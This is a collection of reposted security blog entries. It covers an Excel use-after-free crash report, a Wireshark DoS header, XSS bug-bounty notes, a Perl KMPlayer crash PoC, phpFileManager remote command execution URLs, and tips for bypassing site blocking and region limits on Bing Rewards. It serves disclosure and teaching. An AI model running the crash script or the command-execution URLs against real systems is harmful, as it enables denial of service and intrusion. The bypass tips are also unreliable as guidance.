Microsoft Office Excel 2007, 2010, 2013 - BIFFRecord Use-After-Free Demo By Noah J Franklin


Microsoft Office Excel 2007, 2010, 2013 - BIFFRecord Use-After-Free Demo By Noah J Franklin



# Author :  Google Security Research 
# CVS- 2015 2523

The following crash was observed in Microsoft Excel 2007 running on Windows 2003 R2. This crash was also reproduced in Microsoft Excel 2010 on Windows 7 x86 and Microsoft Excel 2013 on Windows 8.1 x86. The test environment was Excel 2007 on Windows 2003 R2 with application verifier basic checks enabled.
Attached files:
Original File: 683709058_orig.xls
Crashing File: 683709058_crash.xls
Minimized Crashing File: 683709058_min.xls
The minimized crashing file shows two deltas from the original. The first at offset 0x237 is in the data of the 4th BIFFRecord and the second delta at offset 0x34a5 is in the type field of a BIFFRecord.
File versions:
Excel.exe: 12.0.6718.5000
MSO.dll: 12.0.6721.5000
Observed Crash:
eax=00000000 ebx=00000000 ecx=0ce119f8 edx=00003fff esi=0e98de10 edi=0013c82c
eip=30037cc5 esp=00137180 ebp=00137188 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for Excel.exe -
Excel!Ordinal40+0x37cc5:
30037cc5 0fb64604        movzx   eax,byte ptr [esi+4]       ds:0023:0e98de14=??
0:000> kb L8
ChildEBP RetAddr  Args to Child             
WARNING: Stack unwind information not available. Following frames may be wrong.
00137188 303df098 0e98de10 00000000 00000102 Excel!Ordinal40+0x37cc5
0013d068 30528190 0013d0a8 00000102 00000000 Excel!Ordinal40+0x3df098
0013d2bc 305280b1 00000000 00000001 00000008 Excel!Ordinal40+0x528190
0013d330 3038d46d 0013ddf2 00000000 00000001 Excel!Ordinal40+0x5280b1
0013e000 300084a4 0013e104 00000001 0013f568 Excel!Ordinal40+0x38d46d
0013fbb0 30005e9a 02270fd7 00000003 30f61708 Excel!Ordinal40+0x84a4
0013feb8 30003b3a 00000000 02270fd7 00000003 Excel!Ordinal40+0x5e9a
0013ff30 30003884 30000000 00000000 02270fd7 Excel!Ordinal40+0x3b3a
In this crash esi is a heap address. We can see that this is a free chunk:
0:000> !heap -p -a 0xe98de10
    address 0e98de10 found in
    _DPH_HEAP_ROOT @ 1161000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    e7f0fc0:          e98d000             2000
    7c83e330 ntdll!RtlFreeHeap+0x0000011a
    018b1611 vfbasics!AVrfpRtlFreeHeap+0x000000a8
    331039d5 mso!Ordinal1743+0x00002d4d
    329c91d1 mso!MsoFreePv+0x0000003f
    30298310 Excel!Ordinal40+0x00298310
    30300ac3 Excel!Ordinal40+0x00300ac3
    305f1899 Excel!Ordinal40+0x005f1899
This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38214.zip






Wireshark 1.12.7 - Crash PoC

 

 

Wireshark 1.12.7 -  Crash PoC


# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author:SwanBeaujard
# Exploit Demo : Noah Franklin J
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Visit : www.noahfranklin.blogpost.com

 




 

One More XSS on Urbanpro.com



One More XSS on urbanpro.com


I found XSS and Html Injection on TURBANPRO site long back and reported to them . Beore it was named ThinkVidya.






123Contact - XSS and Html Injection- Hall of Fame




123Contact - XSS and HTML Injection- Hall of Fame 

 # Application   : 123ContactForm  website (http://www.123contactform.com)
# Author        : Noah Franklin J - Security Researcher
# Date          : Jul 31 2015
# OS            : Windows
# Tested on     : Win 7
# Type of vulnerability: Html Injection &  Cross Site Scripting
# Geertz to     : Noah Franklin J
# Use for educational purposes only.
# Note: you are not allowed to edit/modify
# if you do, we cannot be held responsible for any damages this may cause.
# Report Sent : Jul 31 2015
#Response from 123Contactform Support Team :  Aug 4  2015
# Disclosed  123Contactform Support Team : Aug 4  2015
#Hall of Fame on  Aug 12 2015 



POC 









Google Translator Helps To Access Blocked Site-Is it Really India Government has banned 857 porn sites ??


Google Translator Helps To Access  Blocked Site 

Is it Really India Government has banned  857 porn sites ??


After Reaading lots of  News Pages i come to know that indian Govt Banned Porn sites.
Department of Telecom to notify internet service providers to block access to 857 URLs, under the provision of Section 79(3)(b) of the Information Technology Act, 2000 as the content hosted on these websites relate to morality, decency as given in Article 19(2) of the Constitution of India


Those Words Block Access made me to think ? Why they didnt Banned  Porn site .? 

What if any one  used proxy or any other Tools to bypass this ?

My old trick i use this in college days but still effective Google Translator can helps all the sites to Unblock because its runs of https protocols and its product of Google Indian Govt cant banned all https connections like Google , Gmail , Facebook. Including Google Translator.


I Request Indian Govt people to check this Bypassing method to block it properly. List of  Blocked Site below 

http://thelogicalindian.com/news/the-complete-list-of-857-porn-websites-blocked-in-india-and-the-governments-clarification/

 POC to unblock the website :

Blocked not Banned .








KMPlayer 3.9.x - .srt Crash PoC

 

 KMPlayer 3.9.x - .srt Crash PoC

 


Kmplayer

K-Multimedia Player (commonly known as The KMPlayer, KMPlayer or KMP) is a media player for Windows which can play a large number of formats including VCD, DVD, AVI, MKV, Ogg, OGM, 3GP, MPEG-1/2/4, WMV, RealMedia, FLV and QuickTime. It has a significant user base and has received strong ratings and reviews on major independent download sites. Source From Wiki 

 

###################################################################
#!/usr/bin/perl -w
# Title : KMPlayer 3.9.x - Crash Proof Of Concept
# Company : http://www.kmplayer.com
# Tested : Windows 7 / Windows 8.1
#
# Author      :   Peyman Motevalli Manesh
# Demo Tut    :   Noah Franklin J
# facebook.com/noahjfranklin || www.noahfranklin.blogspot.com
##################################################################
# 1 . run perl code : perl km.pl
# 2 . open "kmplayer"
# 3 . Load Subtitle (Peyman.srt)
# 4 . Crashed
##################################################################

$eheader="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x14";
$h="\x42"x9850;
$poc="\x41"x500000;
$poc="$h$poc$eheader";
open (Peyman, '>Peyman.srt');
for ($i=1;$i<=4;$i++){
print Peyman "$i\n00:00:01,800 --> 00:00:05,500\n";
print Peyman $poc;
}
close (Peyman);
 




 


phpFileManager 0.9.8 Remote Command Execution






phpFileManager 0.9.8 Remote Command Execution







Description:


phpFileManager is a complete filesystem management tool on a single file. Features: server info, directory tree, copy/move/delete/create/rename/edit/view/chmod files and folders, tar/zip/bzip/gzip, multiple uploads, shell/exec, works on linux/windows




Features


  • server info
  • directory tree
  • copy/move/delete/create/rename/edit/view/chmod files and folders
  • tar/zip/bzip/gzip
  • multiple uploads
  • shell/exec
  • works on linux/windows

Exploits 

 PHPFileManager is vulnerable to remote command execution and will call operating system commands via GET requests from a victims browser. By getting the victim to click our malicious link or visit our malicious website.

Exploit code(s):
===============


Remote Command Execution:
-------------------------

1- call Windows cmd.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe


2- Run Windows calc.exe

https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\calc.exe

 


Source from : 
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0728.txt
 


 
 
 


 

 

PHP File Manager – Multiple Critical Security Vulnerabilities ( Including Backdoor! )

 

PHP File Manager – Multiple Critical Security Vulnerabilities ( Including Backdoor! )

According to Sijmen Ruwhof ( https://twitter.com/sruwhof ) , a security consultant and penetration tester based in the Netherlands, some of the issues have been present in the software for the last five years. After three failed attempts to get in touch with Revived Wire Media, the Virginia-based company behind the product, Ruwhof opted on Monday to disclose the issues publicly – See more at: http://seclists.org/fulldisclosure/2015/Jul/117


Hit Login Button


“Password hashes stored in the user database are unsalted and are generated via the deprecated MD5 hash algorithm,” Ruwhof said. He explained that an attacker could revert the hashes to their original passwords using an online MD5 reversing service.

The file manager also has a weak password strength policy, a lack of variation in default passwords and measures that don’t force the user to change default passwords. Other flaws include an unsecured backdoor, the ability for users to upload arbitrary and unauthenticated files, and no configuration to restrict file extensions.

Source : http://sijmen.ruwhof.net/weblog/411-multiple-critical-security-vulnerabilities-including-a-backdoor-in-php-file-manager

How to Get Free Credits for Skype - Skype to Mobile Free - TUT



Free Credits for Skype  - Skype to mobile Calls free



Step 1 : Create Microsoft Account  like hotmail , live outlook ( i have account )
Step 2 : login to www.bing.com/rewards/dashboard
Step 3 : If you see the error "Bing Rewards isn't available yet in your country or region"
Step 4 : Use Hola proxy plugin for chrome and change the location to USA and reload the Bing
Step 5 : Start Search in Bing for 3 search 1 credit once you reach 100 you can remede 100 credits and use for Skype 
Step 6 : Credits will sent to your Email copy the skype code paste on 



Step 7 : http://www.skype.com/voucher
Step 8 : check your Skype Balance 









 

Step 9 : Feed back to  fb.com/noahjfranklin  and twitter.com/franklinnoahj    :P  





Cross Site Scripting - II



Cross Site Scripting - II

Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non- persistent attack. Here we will see how to hijack other user‘s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won‘t maintain any state with regard to
the request and response. All request and response are independent of each other. But most of the web application don‘t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the
―Sessions‖.

Cross Site Scripting - I





Cross Site Scripting - I



What is Cross Site Scripting ?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy

Types of Cross Site Scripting

XSS attacks are broadly classified into 3  types

•    Non-Persistent ( Reflection Attack )
•    Persistent ( Stored Attack )
•    Dom Based XSS

Non-Persistent XSS Attack


In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visits the link, the crafted code will get executed by the user‘s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS



When the victim load the above URL into the browser, he will see an alert box which says
.Even though this example doesn‘t do any damage, other than the annoying attacked
pop-up, you can see how an attacker can use this method to do several damaging things.

Again using Local Host DVWA Performing Xss Reflection Attack




Enter Any Name and Submit Check the Response of the Website
 




Example I used My Name Noah Franklin  See the Response of the Website its say Hello Noah

Franklin






The alert () method displays an alert box with a specified message and an OK button use the script which used in the below .